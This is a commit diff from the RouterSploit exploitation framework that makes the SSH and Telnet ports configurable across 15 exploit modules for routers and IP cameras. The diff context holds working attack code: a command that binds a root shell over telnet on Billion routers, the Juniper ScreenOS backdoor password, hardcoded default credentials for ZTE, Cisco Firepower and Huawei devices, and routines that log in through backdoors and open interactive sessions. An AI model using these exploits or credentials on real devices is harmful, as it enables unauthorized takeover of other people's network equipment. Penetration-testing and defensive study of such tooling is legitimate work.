Adding FTP,SSH,Telnet ports option (#264)

b0576d88 · Marcin Bury · Mariusz Kupidura · cfbdf33c · b0576d88 · b0576d88
Commit b0576d88 authored May 04, 2017 by Marcin Bury Committed by Mariusz Kupidura May 04, 2017
15 changed files
--- a/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py
+++ b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py
@@ -5,6 +5,7 @@ from routersploit import (
    mute,
    print_error,
    print_success,
+    validators,
 )


@@ -26,8 +27,8 @@ class Exploit(exploits.Exploit):
        ],
    }

-    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')  # target address
-    telnet_port = exploits.Option(23, 'Target port')  # default port
+    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.ipv4)  # target address
+    telnet_port = exploits.Option(23, 'Target port', validators=validators.integer)  # default port

    def run(self):
        if self.check():

--- a/routersploit/modules/exploits/routers/belkin/play_max_prce.py
+++ b/routersploit/modules/exploits/routers/belkin/play_max_prce.py
@@ -32,7 +32,7 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
-    port = exploits.Option(80, 'Target Port')
+    port = exploits.Option(80, 'Target Port', validators=validators.integer)
    cmd = exploits.Option('telnetd', 'Command to execute')

    def auth_bypass(self):

--- a/routersploit/modules/exploits/routers/billion/5200w_rce.py
+++ b/routersploit/modules/exploits/routers/billion/5200w_rce.py
@@ -35,11 +35,11 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
-    port = exploits.Option(80, 'Target port')  # default port
+    port = exploits.Option(80, 'Target port', validators=validators.integer)  # default port
+    telnet_port = exploits.Option(9999, 'Telnet port used for exploitation', validators=validators.integer)  # telnet port used for exploitation

    username = exploits.Option('admin', 'Default username to log in')
    password = exploits.Option('password', 'Default password to log in')
-    telnetport = exploits.Option(9999, 'Telnet port used for exploitation')

    # hardcoded credentials
    creds = [
@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
    ]

    def run(self):
-        cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnetport)
+        cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnet_port)

        if self.execute1(cmd) or self.execute2(cmd):
            self.telnet_connect()
@@ -134,11 +134,11 @@ class Exploit(exploits.Exploit):
        print_status("Trying to connect to the telnet server...")

        try:
-            tn = telnetlib.Telnet(target, self.telnetport)
+            tn = telnetlib.Telnet(target, self.telnet_port)
            tn.interact()
            tn.close()
        except:
-            print_error("Exploit failed - Telnet connection error: {}:{}".format(target, self.telnetport))
+            print_error("Exploit failed - Telnet connection error: {}:{}".format(target, self.telnet_port))

    @mute
    def check(self):

--- a/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
+++ b/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
    telnet_port = exploits.Option(23, 'Target Port', validators=validators.integer)

    action = exploits.Option('set', 'set / unset credless authentication for Telnet service')
-    device = exploits.Option(-1, 'Target device - use "show devices"', validators=int)
+    device = exploits.Option(-1, 'Target device - use "show devices"', validators=validators.integer)

    payloads = [
        # Cisco Catalyst 2960 IOS 12.2(55)SE1

--- a/routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
+++ b/routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
@@ -39,7 +39,8 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target IP address', validators=validators.url)
-    port = exploits.Option(443, 'Target Port')
+    port = exploits.Option(443, 'Target Port', validators=validators.integer)
+    ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer)

    username = exploits.Option('admin', 'Default username to log in')
    password = exploits.Option('Admin123', 'Default password to log in')
@@ -81,7 +82,7 @@ class Exploit(exploits.Exploit):
            target = self.target.replace("http://", "").replace("https://", "")

            try:
-                ssh.connect(target, 22, timeout=5, username=random_text(8), password=random_text(8))
+                ssh.connect(target, self.ssh_port, timeout=5, username=random_text(8), password=random_text(8))
            except paramiko.AuthenticationException:
                    return True  # target is vulnerable
            except:
@@ -155,7 +156,7 @@ class Exploit(exploits.Exploit):

        target = self.target.replace("http://", "").replace("https://", "")
        try:
-            ssh.connect(target, 22, timeout=5, username=username, password=password)
+            ssh.connect(target, self.ssh_port, timeout=5, username=username, password=password)
        except:
            ssh.close()
        else:

--- a/routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
+++ b/routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
-    port = exploits.Option(80, 'Target Port')
+    port = exploits.Option(80, 'Target Port', validators=validators.integer)

    def run(self):
        if self.check():

--- a/routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
+++ b/routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
@@ -7,6 +7,7 @@ from routersploit import (
    print_success,
    print_status,
    mute,
+    validators,
 )


@@ -30,7 +31,8 @@ class Exploit(exploits.Exploit):
        ]
    }

-    target = exploits.Option('', 'Target address e.g. 192.168.1.1')
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)
+    telnet_port = exploits.Option(23, 'Target telnet port', validators=validators.integer)

    def run(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@@ -49,10 +51,10 @@ class Exploit(exploits.Exploit):

        if "Hello" in response:
            print_success("Target seems to vulnerable")
-            print_status("Trying to connect to the telnet service {}:{}".format(self.target, 23))
+            print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port))

            try:
-                tn = telnetlib.Telnet(self.target, 23)
+                tn = telnetlib.Telnet(self.target, self.telnet_port)
                tn.interact()
            except:
                print_error("Exploit failed - could not connect to the telnet service")

--- a/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
+++ b/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
@@ -9,6 +9,7 @@ from routersploit import (
    print_status,
    mute,
    ssh_interactive,
+    validators,
 )


@@ -34,15 +35,15 @@ class Exploit(exploits.Exploit):
        ]
    }

-    target = exploits.Option('', 'Target IP address')
-    port = exploits.Option(22, 'Target Port')
+    target = exploits.Option('', 'Target IP address', validators=validators.ipv4)
+    ssh_port = exploits.Option(22, 'Target Port', validators=validators.integer)

    def run(self):
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
-            client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
+            client.connect(self.target, self.ssh_port, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
        except:
@@ -73,7 +74,7 @@ class Exploit(exploits.Exploit):
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
-            client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
+            client.connect(self.target, self.ssh_port, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
        except:

--- a/routersploit/modules/exploits/routers/huawei/hg630a_default_creds.py
+++ b/routersploit/modules/exploits/routers/huawei/hg630a_default_creds.py
@@ -33,6 +33,8 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target IP address', validators=validators.address)  # target address
+    ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer)  # target port
+
    user = exploits.Option('admin', 'Default username to log in with')
    password = exploits.Option('admin', 'Default password to log in with')

@@ -41,7 +43,7 @@ class Exploit(exploits.Exploit):
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
-            ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
+            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.user, password=self.password)
        except (paramiko.ssh_exception.SSHException, socket.error):
            print_error("Exploit failed - cannot log in with credentials {} / {}".format(self.user, self.password))
            return
@@ -55,7 +57,7 @@ class Exploit(exploits.Exploit):
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
-            ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
+            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.user, password=self.password)
        except (paramiko.ssh_exception.SSHException, socket.error):
            return False  # target is not vulnerable
        else:

--- a/routersploit/modules/exploits/routers/juniper/screenos_backdoor.py
+++ b/routersploit/modules/exploits/routers/juniper/screenos_backdoor.py
@@ -7,6 +7,7 @@ from routersploit import (
    print_error,
    mute,
    ssh_interactive,
+    validators,
 )


@@ -31,7 +32,9 @@ class Exploit(exploits.Exploit):
        ]
    }

-    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)  # target address
+    ssh_port = exploits.Option(22, 'Target SSH port', validators=validators.integer)  # target ssh port
+    telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer)  # target telnet port

    username = "admin"
    password = "<<< %s(un='%s') = %u"
@@ -41,7 +44,7 @@ class Exploit(exploits.Exploit):
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
-            ssh.connect(self.target, 22, timeout=5, username=self.username, password=self.password)
+            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
        except:
            ssh.close()
        else:
@@ -50,7 +53,7 @@ class Exploit(exploits.Exploit):
            return

        try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
            tn.write("\r\n")
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
@@ -79,14 +82,14 @@ class Exploit(exploits.Exploit):
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
-            ssh.connect(self.target, 22, timeout=5, username=self.username, password=self.password)
+            ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password)
        except:
            ssh.close()
        else:
            return True

        try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
            tn.write("\r\n")
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")

--- a/routersploit/modules/exploits/routers/multi/ssh_auth_keys.py
+++ b/routersploit/modules/exploits/routers/multi/ssh_auth_keys.py
@@ -56,6 +56,7 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1', validators=validators.address)  # target address
+    ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.port)  # target port

    private_keys = [
        {  # ExaGrid firmware < 4.8 P26
@@ -250,7 +251,7 @@ class Exploit(exploits.Exploit):
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

            try:
-                ssh.connect(self.target, 22, timeout=5, username=self.valid['user'], pkey=pkey)
+                ssh.connect(self.target, self.ssh_port, timeout=5, username=self.valid['user'], pkey=pkey)
            except:
                ssh.close()
                print_error("Device seems to be not vulnerable")
@@ -274,7 +275,7 @@ class Exploit(exploits.Exploit):
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

            try:
-                ssh.connect(self.target, 22, timeout=5, username=key['user'], pkey=pkey)
+                ssh.connect(self.target, self.ssh_port, timeout=5, username=key['user'], pkey=pkey)
            except:
                ssh.close()
            else:

--- a/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py
+++ b/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py
@@ -41,7 +41,7 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
-    port = exploits.Option(80, 'Target Port')
+    port = exploits.Option(80, 'Target Port', validators=validators.integer)

    def run(self):
        if self.check():

--- a/routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py
+++ b/routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py
@@ -38,7 +38,8 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. https://192.168.1.1', validators=validators.url)  # Target address
-    port = exploits.Option(443, 'Target port e.g. 443')  # Default port
+    port = exploits.Option(443, 'Target port e.g. 443', validators=validators.integer)  # Default port
+    ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer)  # target ssh port

    def run(self):
        if self.check():
@@ -78,7 +79,7 @@ class Exploit(exploits.Exploit):
            ip_target = ip_target.replace('http://', '')
            ip_target = ip_target.replace('/', '')

-            client.connect(ip_target, 22, username='ubnt', pkey=pkey)
+            client.connect(ip_target, self.ssh_port, username='ubnt', pkey=pkey)
            ssh_interactive(client)

        else:

--- a/routersploit/modules/exploits/routers/zte/f609_config_disclosure.py
+++ b/routersploit/modules/exploits/routers/zte/f609_config_disclosure.py
@@ -6,6 +6,7 @@ from routersploit import (
    print_success,
    print_error,
    mute,
+    validators,
 )


@@ -29,7 +30,9 @@ class Exploit(exploits.Exploit):
        ]
    }

-    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)  # target address
+    telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer)  # target telnet port
+
    username = exploits.Option("root", "Username to authenticate with")  # telnet username, default root
    password = exploits.Option("Zte521", "Password to authenticate with")  # telnet password, default Zte521
    config = "sendcmd 1 DB p DevAuthInfo"
@@ -37,7 +40,7 @@ class Exploit(exploits.Exploit):
    def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
@@ -58,12 +61,12 @@ class Exploit(exploits.Exploit):

            tn.close()
        except:
-            print_error("Connection error: {}:{}".format(self.target, 23))
+            print_error("Connection error: {}:{}".format(self.target, self.telnet_port))

    @mute
    def check(self):
        try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)

--- a/routersploit/modules/exploits/routers/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/routers/zte/f6xx_default_root.py
@@ -6,6 +6,7 @@ from routersploit import (
    print_success,
    print_error,
    mute,
+    validators,
 )


@@ -30,14 +31,16 @@ class Exploit(exploits.Exploit):
        ]
    }

-    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4)  # target address
+    telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer)  # target telnet port
+
    username = exploits.Option("root", "Username to authenticate with")  # telnet username, default root
    password = exploits.Option("Zte521", "Password to authenticate with")  # telnet password, default Zte521

    def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
@@ -58,12 +61,12 @@ class Exploit(exploits.Exploit):

            tn.close()
        except:
-            print_error("Connection error {}:23".format(self.target))
+            print_error("Connection error {}:{}".format(self.target, self.telnet_port))

    @mute
    def check(self):
        try:
-            tn = telnetlib.Telnet(self.target, 23)
+            tn = telnetlib.Telnet(self.target, self.telnet_port)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)